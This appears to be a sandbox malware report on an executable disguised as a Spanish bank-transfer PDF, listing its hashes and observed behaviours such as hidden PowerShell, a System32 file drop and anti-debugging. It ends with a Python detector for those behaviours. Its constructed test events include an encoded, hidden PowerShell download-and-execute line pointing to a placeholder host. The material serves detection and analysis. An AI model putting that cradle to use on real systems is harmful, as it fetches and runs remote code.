General

  • Target

    detalle_transferencia_2024-06-17T205732.008 0200_1765330002017577_PDF.exe

  • Size

    583KB

  • Sample

    240620-anbp9sydjf

  • MD5

    b8a89704d7c7ca02539576bdfc10ca7a

  • SHA1

    f23f9988f2db7cbab1401d5d90a00a9101c6c188

  • SHA256

    f3a22e965f778a9b4072a659166407e283688a20492feff37818f61b969efa96

  • SHA512

    b1d1f2df73472daba9097801501ac5bd2add87f3598235965c662eaa04ecb7730bbdf454a18ccd8c87e2be7c848195de8a383feac900b252b7819f337f4a1ed4

  • SSDEEP

    12288:1oGrk4f6kRkGDzfQ/kBvjzowwc/Lds0lE5SaR9K/vxtUf7:1oGI4ykRkGDOSrzowje0lE9cvxu

Score
8/10

Malware Config

Targets

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its console window hidden, so the user sees no window while the script executes.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

    • Suspicious use of NtSetInformationThreadHideFromDebugger (anti-debugging: a thread marked ThreadHideFromDebugger no longer delivers debug events to an attached debugger)

    • Suspicious use of SetThreadContext (commonly used to redirect a suspended thread into injected code, as in process hollowing)
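
The signatures above are what the sandbox observed; the report itself contains no detection logic. As an added example that is not tria.ge's code, the following Python triages Sysmon-style process-creation and file-creation events for two of those behaviours (PowerShell launched with a hidden window, including decoding an -EncodedCommand payload, and a file dropped under System32 by a binary living outside C:\Windows) and checks a byte string against the report's SHA-256. The event field names, the paths, the stage-2 URL and the events themselves are assumptions constructed for this example.

```python
import base64
import hashlib
import re

# IOC copied from the report above; the sample itself is not embedded here.
REPORT_SHA256 = "f3a22e965f778a9b4072a659166407e283688a20492feff37818f61b969efa96"

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# "-w hidden", "-win hidden" and "-WindowStyle Hidden" all select the same
# switch; the nested optional groups cover every prefix of "windowstyle".
HIDDEN_WINDOW_RE = re.compile(
    r"(?:^|\s)[-/]w(?:i(?:n(?:d(?:o(?:w(?:s(?:t(?:y(?:l(?:e)?)?)?)?)?)?)?)?)?)?\s+hidden\b",
    re.IGNORECASE,
)
# Common spellings of -EncodedCommand followed by its base64 argument.
ENCODED_CMD_RE = re.compile(
    r"(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE inside base64), or None."""
    m = ENCODED_CMD_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_hidden_powershell(ev: dict) -> bool:
    """ProcessCreate of powershell/pwsh whose command line hides the window."""
    return (
        ev["event"] == "ProcessCreate"
        and basename(ev["image"]) in POWERSHELL_IMAGES
        and HIDDEN_WINDOW_RE.search(ev["command_line"]) is not None
    )


def is_system32_drop(ev: dict) -> bool:
    """FileCreate under System32 by an image that does not itself live under C:\\Windows."""
    if ev["event"] != "FileCreate":
        return False
    target = ev["target"].lower()
    image = ev["image"].lower()
    return target.startswith("c:\\windows\\system32\\") and not image.startswith("c:\\windows\\")


def sha256_matches_report(data: bytes) -> bool:
    return hashlib.sha256(data).hexdigest() == REPORT_SHA256


def triage(events):
    """Map each event to the report signature it would trigger, in event order."""
    hits = []
    for ev in events:
        if is_hidden_powershell(ev):
            hits.append(("Command and Scripting Interpreter: PowerShell (hidden window)", ev["command_line"]))
        if is_system32_drop(ev):
            hits.append(("Drops file in System32 directory", ev["target"]))
    return hits


# Constructed Sysmon-style events (assumed field names; not taken from the report).
DROPPER = r"C:\Users\user\Downloads\detalle_transferencia_PDF.exe"  # hypothetical path
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": PS_IMAGE, "parent_image": DROPPER,
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"event": "ProcessCreate", "image": PS_IMAGE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Process"},
    {"event": "FileCreate", "image": DROPPER, "target": r"C:\Windows\System32\update.dll"},
    {"event": "FileCreate", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\config\systemprofile\x.dat"},
]

if __name__ == "__main__":
    for name, detail in triage(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
    print("decoded stage 2:", decode_encoded_command(SAMPLE_EVENTS[0]["command_line"]))
```

The System32 rule is deliberately narrow (creator outside C:\Windows) to keep installers and servicing processes out of the hit list; a real deployment would also key on the parent chain, since the hidden PowerShell here is spawned by the downloaded executable rather than by explorer.exe.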

MITRE ATT&CK Enterprise v15

Tasks